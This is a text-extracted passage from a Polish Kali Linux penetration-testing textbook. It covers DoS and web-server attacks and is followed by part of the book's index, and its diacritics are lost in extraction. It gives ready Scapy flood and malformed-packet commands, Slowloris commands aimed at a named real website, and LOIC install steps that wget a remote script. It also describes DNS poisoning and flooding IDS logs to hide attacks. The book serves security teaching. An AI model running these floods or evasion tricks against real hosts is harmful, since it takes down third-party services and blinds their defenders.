Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
